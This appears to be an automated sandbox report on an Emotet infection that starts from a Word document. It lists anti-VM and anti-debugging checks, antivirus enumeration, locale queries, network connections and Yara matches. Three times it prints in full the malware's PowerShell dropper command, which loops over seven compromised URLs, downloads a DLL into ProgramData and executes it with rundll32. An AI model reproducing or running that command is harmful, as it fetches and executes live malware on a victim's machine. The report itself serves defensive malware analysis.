Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000615A6672 second address: 00000000615A66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF82C79A621h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000615A8A23 second address: 00000000615A8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF82C79A43Eh 0x00000007 rdtscp
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6456 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1230
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 4.0 %
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A6620 rdtscp 14_2_615A6620
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000005.00000003.312282002.0000000004F7A000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 00000005.00000002.340816682.0000000004A9A000.00000004.00000001.sdmp Binary or memory string: ,d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000003.00000002.533812198.0000015122029000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.533685658.0000020B61E67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.533555344.0000023134829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615CD1EE FindFirstFileExA, 14_2_615CD1EE
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A6620 mov ecx, dword ptr fs:[00000030h] 14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A6510 mov eax, dword ptr fs:[00000030h] 14_2_615A6510
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B849D mov esi, dword ptr fs:[00000030h] 14_2_615B849D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615C69AA mov eax, dword ptr fs:[00000030h] 14_2_615C69AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A8A50 mov eax, dword ptr fs:[00000030h] 14_2_615A8A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068DE10 mov eax, dword ptr fs:[00000030h] 16_2_0068DE10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B81F2 IsDebuggerPresent,OutputDebugStringW, 14_2_615B81F2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B83A7 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList, 14_2_615B83A7
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A6620 rdtscp 14_2_615A6620
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_615B5239
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_615B5ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615BED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_615BED41

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.79.33.48 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 168.197.250.14 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.178.61.60 187
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 14_2_615D6017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_615D60E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 14_2_615CE2F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 14_2_615D57AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 14_2_615D597B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_615D5B0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_615D5B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_615D5A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_615D5A24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 14_2_615D5DE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 14_2_615CDD93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_615D5F10
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B5916 cpuid 14_2_615B5916
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 14_2_615B5C3C

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000A.00000002.533453735.000001A70123D000.00000004.00000001.sdmp Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.533595093.000001A701302000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A1A40 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 14_2_615A1A40